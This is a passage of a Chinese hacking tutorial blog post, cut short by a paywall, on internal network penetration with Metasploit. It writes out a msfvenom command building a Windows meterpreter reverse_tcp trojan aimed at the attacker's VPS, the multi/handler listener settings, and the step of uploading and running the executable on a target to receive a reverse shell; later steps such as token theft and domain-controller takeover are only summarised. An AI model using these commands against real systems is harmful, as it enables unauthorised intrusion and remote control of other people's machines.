零基础学黑客,搜索公众号:白帽子左一
作者:掌控安全-小熊保安
本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀.
一、MSF生成木马上线目标
1. 生成木马
使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f exe > exp.exe 创建一个msf的木马(不免杀版本)
其中 -p 后面的内容是使用的 payload类型,LHOST是vps的地址,LPORT是端口

2. 监听端口
命令: use exploit/multi/handler 使用msf的监听模块
设置payload: set payload windows/x64/meterpreter/reverse_tcp
这里和生成木马的时候写的payload要一样,否则会链接不上,如下图

设置监听地址以及端口:
set lhost xxx.xxx.xxx.xxx
set lport 4444
设置好了之后 直接run 监听起来。
3. 弹回Meterpreter会话
将生成的msf的木马上传到目标服务器上,然后直接运行

运行之后,vps的msf会收到一个弹回的meterpreter会话
本文详细介绍了利用MSF进行内网渗透的步骤,包括MSF木马生成、信息收集、主机探测、令牌窃取以及操作域控等环节,展示了如何在不同阶段执行相关命令和操作。
最低0.47元/天 解锁文章

1万+

被折叠的 条评论
为什么被折叠?



